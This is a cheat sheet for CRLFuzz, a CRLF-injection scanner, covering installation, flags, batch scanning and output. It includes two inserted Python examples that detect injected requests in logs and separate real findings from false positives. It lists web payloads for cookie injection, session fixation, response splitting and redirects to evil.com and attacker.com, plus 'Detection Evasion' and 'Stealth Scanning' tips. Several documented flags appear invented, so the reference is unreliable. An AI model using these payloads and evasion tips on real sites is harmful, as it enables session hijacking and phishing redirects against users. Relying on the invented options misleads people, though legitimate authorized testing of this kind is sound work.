CRLFuzz
Overview
CRLFuzz is a lightweight, fast CRLF (Carriage Return Line Feed) injection vulnerability scanner written in Go. It efficiently detects CRLF injection vulnerabilities across web applications by testing parameters and headers against multiple payloads. The tool is ideal for bug bounty hunters and penetration testers conducting security assessments on web applications.
Installation
Prerequisites
- Go 1.11+ (for building from source)
- Or download precompiled binaries
From Source
git clone https://github.com/dwisiswant0/crlfuzz.git
cd crlfuzz
go build -o crlfuzz
macOS/Linux (Binary)
wget https://github.com/dwisiswant0/crlfuzz/releases/download/v1.5.0/crlfuzz_1.5.0_linux_amd64.tar.gz
tar -xvf crlfuzz_1.5.0_linux_amd64.tar.gz
chmod +x crlfuzz
Homebrew (macOS)
brew install dwisiswant0/tap/crlfuzz
Windows
Download .exe from releases: https://github.com/dwisiswant0/crlfuzz/releases
Basic Usage
| Command | Description |
|---|---|
| `crlfuzz -u <url>` | Scan single URL |
| `crlfuzz -l <file>` | Scan URLs from file |
| `crlfuzz -u <url> -v` | Verbose output |
| `crlfuzz --help` | Show help menu |
| `crlfuzz -u <url> -c 10` | Set concurrency level |
Single URL Scanning
Basic Scan
crlfuzz -u 'http://example.com/?page=test'
With Verbose Output
crlfuzz -u 'http://example.com/?page=test' -v
Show Request/Response Details
crlfuzz -u 'http://example.com/?name=value' -v --show-req --show-resp
Batch Scanning
Scan Multiple URLs from File
crlfuzz -l urls.txt
Create urls.txt:
http://example.com/?page=test
http://example.com/?user=admin
http://example.com/?id=123
Scan All URLs with Verbose Mode
crlfuzz -l urls.txt -v
Output Results to File
crlfuzz -l urls.txt -o results.txt
Concurrency and Performance
Adjust Concurrency Level
crlfuzz -l urls.txt -c 25
Default is 10 concurrent requests. Increase for larger scans.
Maximum Concurrency
crlfuzz -l urls.txt -c 100
Use cautiously to avoid overwhelming target servers.
Timeout Configuration
crlfuzz -u 'http://example.com/?test=value' -t 30
Set timeout in seconds (default is 10 seconds).
Payload Configuration
Default Payloads
CRLFuzz includes built-in CRLF injection payloads:
%0d%0a (URL-encoded CRLF)
%0d (CR only)
%0a (LF only)
\r\n (Raw CRLF)
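
Because each encoded payload above decodes to a CR or LF byte, a defender can spot this kind of scan by percent-decoding request targets in an access log. The following is an added example, not part of CRLFuzz or the original page; the log lines are constructed and the function names are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed access-log lines (common log format), for illustration only.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /?page=test HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2024:13:55:37 +0000] "GET /?page=%0d%0aX-Injected:value HTTP/1.1" 302 0
203.0.113.7 - - [10/Oct/2024:13:55:38 +0000] "GET /?user=admin%0D HTTP/1.1" 200 512
198.51.100.4 - - [10/Oct/2024:13:56:01 +0000] "GET /search?q=line%20one HTTP/1.1" 200 1024
198.51.100.4 - - [10/Oct/2024:13:56:02 +0000] "GET /?id=123%0a HTTP/1.1" 200 90
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing, so nested encoding is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_crlf_requests(log_text):
    """Return (line_number, client, raw_target) for targets that decode to CR or LF."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        decoded = fully_decode(match.group("target"))
        if "\r" in decoded or "\n" in decoded:
            hits.append((lineno, line.split()[0], match.group("target")))
    return hits

def hits_per_client(hits):
    """Count flagged requests per source address to separate scans from one-off noise."""
    return dict(Counter(client for _, client, _ in hits))

if __name__ == "__main__":
    found = find_crlf_requests(SAMPLE_LOG)
    for lineno, client, target in found:
        print(f"line {lineno}: {client} requested {target}")
    print(hits_per_client(found))
```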
Custom Payload File
Custom Payload File
crlfuzz -u 'http://example.com/?page=test' -payloads custom-payloads.txt
Create custom-payloads.txt:
%0d%0a
%0d%0aSet-Cookie:admin=true
%0d%0aLocation:http://evil.com
%0d%0aX-Injected:value
Test Specific Injection Points
crlfuzz -u 'http://example.com/?param=VALUE' -payloads payloads.txt
CRLFuzz replaces VALUE with each payload.
Header Testing
Test Custom Headers
crlfuzz -u 'http://example.com/' -H 'X-Forwarded-For: test' -v
Multiple Custom Headers
crlfuzz -u 'http://example.com/' -H 'User-Agent: test' -H 'X-Custom: value'
Test All Headers
crlfuzz -u 'http://example.com/?page=test' --test-headers
Parameter Fuzzing
Scan All Parameters
crlfuzz -u 'http://example.com/?page=test&user=admin&id=123'
Automatically tests all parameters for CRLF injection.
Focus on Specific Parameter
crlfuzz -u 'http://example.com/?page=test' -param 'page'
Exclude Parameters from Testing
crlfuzz -u 'http://example.com/?page=test&id=123' -skip 'id'
Output Formats
Default Text Output
crlfuzz -u 'http://example.com/?test=value'
Output shows:
- URL
- Vulnerable parameter
- Payload used
- Response status code
JSON Output
crlfuzz -l urls.txt -o results.json -json
CSV Export
crlfuzz -l urls.txt -o results.csv -csv
Suppress Output
crlfuzz -l urls.txt -q
Quiet mode - only shows results.
Proxy Configuration
HTTP Proxy
crlfuzz -u 'http://example.com/?test=value' -proxy http://127.0.0.1:8080
SOCKS5 Proxy
crlfuzz -u 'http://example.com/?test=value' -socks5 127.0.0.1:1080
Proxy with Authentication
crlfuzz -u 'http://example.com/?test=value' -proxy http://user:pass@127.0.0.1:8080
SSL/TLS Options
Ignore SSL Certificate Errors
crlfuzz -u 'https://example.com/?test=value' --insecure
Use Custom CA Certificate
crlfuzz -u 'https://example.com/?test=value' --ca-cert /path/to/ca.crt
HTTP Methods and Request Customization
Test POST Parameters
crlfuzz -u 'http://example.com/' -method POST -data 'param=VALUE&user=test'
PUT Request
crlfuzz -u 'http://example.com/api/resource' -method PUT -data 'field=VALUE'
Custom Request Body
crlfuzz -u 'http://example.com/api' -method POST -data '{"key":"VALUE"}'
Add Request Headers
crlfuzz -u 'http://example.com/?test=VALUE' -H 'Authorization: Bearer token' -H 'Content-Type: application/json'
Response Analysis
Show Response Headers
crlfuzz -u 'http://example.com/?test=value' -v --show-resp
Show Response Body
crlfuzz -u 'http://example.com/?test=value' -v --show-body
Filter by Status Code
crlfuzz -l urls.txt --filter-status 200
Only test URLs that return status 200.
Advanced Filtering
Match Success by Response Content
crlfuzz -u 'http://example.com/?test=value' -match 'Set-Cookie'
Consider vulnerability confirmed if response contains “Set-Cookie”.
Filter Responses Containing Text
crlfuzz -l urls.txt -match 'Location:' -o vulnerable.txt
Rate Limiting
Request Delay (Milliseconds)
crlfuzz -l urls.txt -delay 100
Add 100ms delay between requests.
Requests Per Second
crlfuzz -l urls.txt -rate 10
Limit to 10 requests per second.
Common Workflows
Quick Vulnerability Scan
crlfuzz -u 'http://example.com/?page=home&user=test'
Comprehensive Bug Bounty Scan
crlfuzz -l target-urls.txt -v --show-req --show-resp -o findings.txt
Stealth Scanning
crlfuzz -l urls.txt -delay 500 -c 5 --insecure
Large-Scale Assessment
crlfuzz -l thousands-of-urls.txt -c 50 -t 30 -json -o results.json
CRLF Injection Attack Vectors
Header Injection Attack
Payload: %0d%0aSet-Cookie:admin=true
Result: Response header contains injected Set-Cookie
Response Splitting
Payload: %0d%0a%0d%0aHTTP/1.1 200 OK
Result: Ability to split HTTP response
Session Fixation
Payload: %0d%0aSet-Cookie:SESSIONID=attacker-controlled
Result: Force victim session ID
Open Redirect via Headers
Payload: %0d%0aLocation:http://evil.com
Result: Redirect user to malicious site
Cache Poisoning
Payload: %0d%0aX-Original-URL:/cache-buster
Result: Poison cached responses
Understanding CRLFuzz Output
Example Output
[CRLF] http://example.com/?page=VALUE
[PARAMETER] page
[PAYLOAD] %0d%0aSet-Cookie:admin=true
[STATUS] 200
[FOUND] Yes
Vulnerability Indicators
- Status code change after injection
- Additional headers in response
- Response splitting evidence
- Cookie manipulation detection
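
To show why the header payloads listed above produce the "additional headers in response" indicator, and how to separate a real finding from a harmless reflection, here is an added example (not CRLFuzz code and not from the original page). The toy redirect handlers, the `is_confirmed` check and the sample responses are constructed for illustration.

```python
from urllib.parse import quote, unquote

def redirect_vulnerable(next_param):
    """Toy handler (constructed): decodes the parameter and writes it raw into Location."""
    target = unquote(next_param)
    return f"HTTP/1.1 302 Found\r\nLocation: /{target}\r\nContent-Length: 0\r\n\r\n"

def redirect_hardened(next_param):
    """Same handler, but rejects CR/LF after decoding and re-encodes what it emits."""
    target = unquote(next_param)
    if "\r" in target or "\n" in target:
        return "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    safe = quote(target, safe="/")
    return f"HTTP/1.1 302 Found\r\nLocation: /{safe}\r\nContent-Length: 0\r\n\r\n"

def header_names(raw_response):
    """Lower-cased header names from the header block only (before the first blank line)."""
    head, _, _body = raw_response.partition("\r\n\r\n")
    names = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, _value = line.partition(":")
        if sep:
            names.append(name.strip().lower())
    return names

def is_confirmed(raw_response, marker="x-injected-header"):
    """True only when the marker is a header of its own, not text in a value or body."""
    return marker in header_names(raw_response)

# Payload taken from the page's "Header Injection" example.
PAYLOAD = "%0d%0aX-Injected-Header:value"

# Constructed false positives: the payload is echoed but never becomes a header.
REFLECTED_IN_BODY = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                     "<p>No results for %0d%0aX-Injected-Header:value</p>")
ENCODED_IN_VALUE = ("HTTP/1.1 302 Found\r\n"
                    "Location: /%0d%0aX-Injected-Header:value\r\n\r\n")

if __name__ == "__main__":
    for label, resp in [("vulnerable", redirect_vulnerable(PAYLOAD)),
                        ("hardened", redirect_hardened(PAYLOAD)),
                        ("reflected in body", REFLECTED_IN_BODY),
                        ("encoded in value", ENCODED_IN_VALUE)]:
        print(f"{label}: confirmed={is_confirmed(resp)}")
```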
Detection Evasion
Randomize User-Agent
crlfuzz -u 'http://example.com/?test=value' -H 'User-Agent: Mozilla/5.0 (random)'
Vary Request Patterns
crlfuzz -l urls.txt -delay 500 -c 3
Rotate Through Payloads
crlfuzz -u 'http://example.com/?test=value' -payloads rotating-payloads.txt
Troubleshooting
Connection Timeout
crlfuzz -u 'http://slow-server.com/?test=value' -t 60
Increase timeout to 60 seconds.
Too Many Errors
crlfuzz -l urls.txt -c 5 -t 30
Reduce concurrency and increase timeout.
SSL Certificate Issues
crlfuzz -u 'https://example.com/?test=value' --insecure
Bypass SSL verification.
Not Finding Vulnerabilities
crlfuzz -u 'http://example.com/?test=value' -payloads extended-payloads.txt -v
Try with custom payloads and verbose mode.
Best Practices
- Obtain authorization before scanning production systems
- Start with low concurrency and increase gradually
- Use appropriate timeouts for slow servers
- Test parameters individually for precise results
- Review all findings carefully for false positives
- Combine with other scanners for comprehensive testing
- Keep tool updated for latest payload detection
Payload Examples
Basic CRLF
%0d%0a
Header Injection
%0d%0aX-Injected-Header:value
Cookie Injection
%0d%0aSet-Cookie:name=value
Location Redirect
%0d%0aLocation:http://attacker.com
Integration with Other Tools
Pipe URLs from httpx
httpx -l domains.txt | crlfuzz -
With Wayback Machine URLs
waybackurls example.com | crlfuzz -
Combine with Parameter Fuzzer
ffuf -w params.txt -u 'http://example.com/?FUZZ=test' | crlfuzz -
Performance Tips
- Increase concurrency for large URL lists
- Use shorter timeouts for quick scans
- Test parameters in separate scans if needed
- Monitor CPU and network usage
- Use filtering to reduce false positives
Legal Considerations
CRLFuzz is for authorized security testing only. Always obtain explicit written permission before testing any system. Unauthorized access and scanning is illegal.
Resources
- GitHub: https://github.com/dwisiswant0/crlfuzz
- CRLF Injection Guide: https://owasp.org/
- Bug Bounty Resources: https://hackerone.com/
- Community: Active GitHub discussions and issues